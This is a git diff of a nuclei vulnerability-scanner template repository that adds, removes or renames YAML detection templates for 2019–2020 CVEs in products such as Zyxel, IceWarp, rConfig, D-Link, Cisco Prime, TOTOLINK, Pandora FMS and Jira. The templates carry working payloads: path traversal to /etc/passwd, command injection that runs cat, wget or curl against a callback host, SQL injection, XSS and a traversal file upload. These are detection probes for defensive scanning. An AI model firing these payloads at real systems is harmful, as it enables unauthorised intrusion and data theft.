@@ -0,0 +1,43 @@ +id: CVE-2019-12581 + +info: + name: Zyxel ZyWall / USG / UAG - Reflected Cross-site scripting + author: n-thumann + severity: medium + description: A reflective Cross-site scripting (XSS) vulnerability in the free_time_failed.cgi CGI program in selected Zyxel ZyWall, USG, and UAG devices allows remote attackers to inject arbitrary web script or HTML via the err_msg parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 + - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml + - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ + - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12581 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ZyWall" + tags: cve,cve2019,zyxel,zywall,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/free_time_failed.cgi?err_msg=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Please contact with administrator." + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-12593.yaml b/nuclei-templates/CVE-2019/cve-2019-12593.yaml deleted file mode 100644 index d0cadf98c8..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-12593.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2019-12593 - -info: - name: IceWarp <=10.4.4 - Local File Inclusion - author: pikpikcu - severity: high - description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. - tags: cve,cve2019,lfi - reference: - - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt - - https://nvd.nist.gov/vuln/detail/CVE-2019-12593 - - http://www.icewarp.com # vendor homepage - - https://www.icewarp.com/downloads/trial/ # software link - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2019-12593 - cwe-id: CWE-22 - metadata: - google-dork: Powered By IceWarp 10.4.4 - -requests: - - method: GET - path: - - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini' - - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "[intl]" - - "root:x:0" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-12962.yaml b/nuclei-templates/CVE-2019/cve-2019-12962.yaml deleted file mode 100644 index f7f0a30170..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-12962.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2019-12962 - -info: - name: LiveZilla Server 8.0.1.0 - Cross Site Scripting - author: Clment Cruchet - severity: medium - description: | - LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS - reference: - - https://www.exploit-db.com/exploits/49669 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12962 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:LiveZilla - verified: true - tags: cve,cve2019,livezilla,xss - - -requests: - - method: GET - path: - - '{{BaseURL}}/mobile/index.php' - - headers: - Accept-Language: ';alert(document.domain)//' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var detectedLanguage = ';alert(document.domain)//';" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-14312.yaml b/nuclei-templates/CVE-2019/cve-2019-14312.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14312.yaml rename to nuclei-templates/CVE-2019/cve-2019-14312.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15859.yaml b/nuclei-templates/CVE-2019/cve-2019-15859.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-15859.yaml rename to nuclei-templates/CVE-2019/cve-2019-15859.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16097.yaml b/nuclei-templates/CVE-2019/cve-2019-16097.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16097.yaml rename to nuclei-templates/CVE-2019/cve-2019-16097.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16662.yaml b/nuclei-templates/CVE-2019/cve-2019-16662.yaml deleted file mode 100644 index 7ab910ea7e..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-16662.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2019-16662 - -info: - name: rConfig 3.9.2 - Remote Code Execution - author: pikpikcu - severity: critical - reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ - tags: cve,cve2019,rce,intrusive - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-16662 - cwe-id: CWE-78 - description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution." - -requests: - - method: GET - path: - - "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2019/CVE-2019-16759.yaml b/nuclei-templates/CVE-2019/cve-2019-16759.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16759.yaml rename to nuclei-templates/CVE-2019/cve-2019-16759.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16996.yaml b/nuclei-templates/CVE-2019/cve-2019-16996.yaml deleted file mode 100644 index 167ea7dcdf..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-16996.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2019-16996 - -info: - name: Metinfo 7.0.0 beta - SQL Injection - author: ritikchaddha - severity: high - description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter. - reference: - - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1 - - https://nvd.nist.gov/vuln/detail/CVE-2019-16996 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2019-16996 - cwe-id: CWE-89 - tags: metinfo,sqli,cve,cve2019 - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "1918835981" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/14 diff --git a/nuclei-templates/CVE-2019/cve-2019-17382.yaml b/nuclei-templates/CVE-2019/cve-2019-17382.yaml deleted file mode 100644 index 24cfb039e5..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-17382.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-17382 - -info: - name: Zabbix Authentication Bypass - author: harshbothra_ - severity: critical - description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. - reference: https://www.exploit-db.com/exploits/47467 - tags: cve,cve2019,zabbix,fuzz - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.10 - cve-id: CVE-2019-17382 - cwe-id: CWE-639 - -requests: - - raw: - - | - GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en-US,en;q=0.9 - - payloads: - ids: helpers/wordlists/numbers.txt - - threads: 50 - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: status - status: - - 200 - - - type: word - words: - - "Dashboard" diff --git a/nuclei-templates/CVE-2019/CVE-2019-17418.yaml b/nuclei-templates/CVE-2019/cve-2019-17418.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-17418.yaml rename to nuclei-templates/CVE-2019/cve-2019-17418.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17503.yaml b/nuclei-templates/CVE-2019/cve-2019-17503.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-17503.yaml rename to nuclei-templates/CVE-2019/cve-2019-17503.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-17506.yaml b/nuclei-templates/CVE-2019/cve-2019-17506.yaml new file mode 100644 index 0000000000..0dbb3edcee --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17506.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-17506 + +info: + name: DLINK DIR-868L & DIR-817LW Info Leak + author: pikpikcu + severity: critical + description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. + reference: https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py + tags: cve,cve2019,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-17506 + cwe-id: CWE-306 + +requests: + - method: POST + path: + - "{{BaseURL}}/getcfg.php" + + body: | + SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a + headers: + Content-Type: text/xml + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + - "DEVICE.ACCOUNT" + part: body + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-1821.yaml b/nuclei-templates/CVE-2019/cve-2019-1821.yaml new file mode 100644 index 0000000000..dc80c371b1 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-1821.yaml @@ -0,0 +1,57 @@ +id: CVE-2019-1821 + +info: + name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821) + author: _0xf4n9x_ + severity: critical + description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. + reference: + - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821 + metadata: + shodan-query: 'http.title:"prime infrastructure"' + tags: rce,fileupload,unauth,cve,cve2019 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-1821 + cwe-id: CWE-20 + +requests: + - raw: + - | + POST /servlet/UploadServlet HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Primary-IP: 127.0.0.1 + Filename: test.tar + Filesize: 10240 + Compressed-Archive: false + Destination-Dir: tftpRoot + Filecount: 1 + Content-Length: 269 + Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 + + --871a4a346a547cf05cb83f57b9ebcb83 + Content-Disposition: form-data; name="files"; filename="test.tar" + + ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} + --871a4a346a547cf05cb83f57b9ebcb83-- + + - | + GET /test.txt HTTP/1.1 + Host: {{Host}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code==200" + - "contains((body_2), '{{randstr}}')" + condition: and diff --git a/nuclei-templates/CVE-2019/cve-2019-18371.yaml b/nuclei-templates/CVE-2019/cve-2019-18371.yaml deleted file mode 100644 index 9be742b6a4..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-18371.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2019-18371 - -info: - name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion - author: ritikchaddha - severity: high - description: | - Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. - reference: - - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html - - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py - - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18371 - cwe-id: CWE-22 - tags: xiaomi,cve2019,cve,lfi,router,mi,router - -requests: - - method: GET - path: - - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18393.yaml b/nuclei-templates/CVE-2019/cve-2019-18393.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-18393.yaml rename to nuclei-templates/CVE-2019/cve-2019-18393.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-18394.yaml b/nuclei-templates/CVE-2019/cve-2019-18394.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-18394.yaml rename to nuclei-templates/CVE-2019/cve-2019-18394.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-19781.yaml b/nuclei-templates/CVE-2019/cve-2019-19781.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-19781.yaml rename to nuclei-templates/CVE-2019/cve-2019-19781.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-19824.yaml b/nuclei-templates/CVE-2019/cve-2019-19824.yaml new file mode 100644 index 0000000000..35562023ae --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-19824.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-19824 + +info: + name: TOTOLINK - Remote Code Execution + author: gy741 + severity: high + description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. + reference: + - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 + - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-19824 + cwe-id: CWE-78 + tags: cve,cve2019,totolink,rce,router + +requests: + - raw: + - | + POST /boafrm/formSysCmd HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46cGFzc3dvcmQ= + Content-Type: application/x-www-form-urlencoded + + submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2019/cve-2019-20141.yaml b/nuclei-templates/CVE-2019/cve-2019-20141.yaml deleted file mode 100644 index cc7ccb3827..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-20141.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2019-20141 - -info: - name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting - author: knassar702 - severity: medium - description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter. - remediation: | - Apply the latest security patch or update provided by the theme developer to fix the XSS vulnerability. - reference: - - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html - - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html - - https://knassar702.github.io/cve/neon/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-20141 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-20141 - cwe-id: CWE-79 - epss-score: 0.00125 - epss-percentile: 0.46806 - cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: laborator - product: neon - framework: wordpress - tags: cve2019,cve,xss,laborator,wordpress - -http: - - method: GET - path: - - '{{BaseURL}}/data/autosuggest-remote.php?q=">' - - '{{BaseURL}}/admin/data/autosuggest-remote.php?q=">' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - ">>)1(trela=rorreno" - - - type: word - part: header - words: - - "text/html" -# digest: 490a004630440220364007b5b353132d3e613a97b3c9f9453c1458e01438e0e259cd73afc23276ad022001dd8bc347d2107af7f57bd1fab63468c0320329d58618fcebf87bed4fd9c85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-20183.yaml b/nuclei-templates/CVE-2019/cve-2019-20183.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-20183.yaml rename to nuclei-templates/CVE-2019/cve-2019-20183.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-20224.yaml b/nuclei-templates/CVE-2019/cve-2019-20224.yaml new file mode 100644 index 0000000000..1564fd5f33 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-20224.yaml @@ -0,0 +1,53 @@ +id: CVE-2019-20224 + +info: + name: Pandora FMS 7.0NG - Remote Command Injection + author: ritikchaddha + severity: high + description: | + Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + reference: + - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ + - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 + - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-20224 + cwe-id: CWE-78 + tags: pandorafms,rce,cve,cve2019,authenticated,oast + +requests: + - raw: + - | + POST /pandora_console/index.php?login=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nick=admin&pass=admin&login_button=Login + + - | + POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/CVE-2019-2729.yaml b/nuclei-templates/CVE-2019/cve-2019-2729.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-2729.yaml rename to nuclei-templates/CVE-2019/cve-2019-2729.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-3401.yaml b/nuclei-templates/CVE-2019/cve-2019-3401.yaml deleted file mode 100644 index 9696be56d8..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-3401.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-3401 - -info: - name: Atlassian JIRA Information Exposure (CVE-2019-3401) - author: TechbrunchFR,milo2012 - description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. - severity: medium - tags: cve,cve2019,jira,atlassian - reference: https://jira.atlassian.com/browse/JRASERVER-69244 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2019-3401 - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" - matchers: - - type: word - words: - - '' - - 'Manage Filters - Jira' - condition: and - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/nuclei-templates/CVE-2019/cve-2019-3929.yaml b/nuclei-templates/CVE-2019/cve-2019-3929.yaml deleted file mode 100644 index 5098a71d3c..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-3929.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-3929 - -info: - name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) - author: _0xf4n9x_ - severity: critical - description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. - reference: - - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - - https://www.exploit-db.com/exploits/46786/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 - tags: rce,cve,cve2019,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-3929 - cwe-id: CWE-78 - -requests: - - method: POST - path: - - "{{BaseURL}}/cgi-bin/file_transfer.cgi" - - body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" - headers: - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2019/cve-2019-7192.yaml b/nuclei-templates/CVE-2019/cve-2019-7192.yaml deleted file mode 100644 index 8aa8658ac1..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-7192.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-7192 - -info: - name: QNAP Photo Station RCE - author: medbsq - severity: medium - - #https://www.cvebase.com/cve/2019/7192 -requests: - - method: GET - path: - - "{{BaseURL}}/photo/p/api/video.php" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers: - - type: status - status: - - 401 - - - \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-7543.yaml b/nuclei-templates/CVE-2019/cve-2019-7543.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7543.yaml rename to nuclei-templates/CVE-2019/cve-2019-7543.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-8449.yaml b/nuclei-templates/CVE-2019/cve-2019-8449.yaml deleted file mode 100644 index 8467b0fa56..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-8449.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2019-8449 - -info: - name: JIRA Unauthenticated Sensitive Information Disclosure - author: harshbothra_ - severity: medium - description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. - reference: - - https://www.doyler.net/security-not-included/more-jira-enumeration - - https://jira.atlassian.com/browse/JRASERVER-69796 - tags: cve,cve2019,atlassian,jira - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2019-8449 - cwe-id: CWE-306 - -requests: - - method: GET - path: - - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '{"users":{"users":' - part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-9041.yaml b/nuclei-templates/CVE-2019/cve-2019-9041.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-9041.yaml rename to nuclei-templates/CVE-2019/cve-2019-9041.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9922.yaml b/nuclei-templates/CVE-2019/cve-2019-9922.yaml deleted file mode 100644 index 9860c82699..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-9922.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2019-9922 -info: - name: JE Messenger 1.2.2 Joomla - Directory Traversal - author: 0x_Akoko - severity: high - description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files. - reference: - - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - - https://www.cvedetails.com/cve/CVE-2019-9922 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-9922 - cwe-id: CWE-22 - tags: cve,cve2019,joomla,messenger,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-10220.yaml b/nuclei-templates/CVE-2020/CVE-2020-10220.yaml deleted file mode 100644 index ea87e49534..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10220.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2020-10220 - -info: - name: rConfig 3.9 - SQL Injection - author: ritikchaddha,theamanrawat - severity: critical - description: | - An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. - remediation: | - Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability. - reference: - - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 - - http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html - - http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html - - https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-10220 - cwe-id: CWE-89 - epss-score: 0.03051 - epss-percentile: 0.90763 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: rconfig - product: rconfig - shodan-query: title:"rConfig" - tags: cve,cve2020,packetstorm,rconfig,sqli -variables: - num: "999999999" - -http: - - method: GET - path: - - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--" - - matchers-condition: and - matchers: 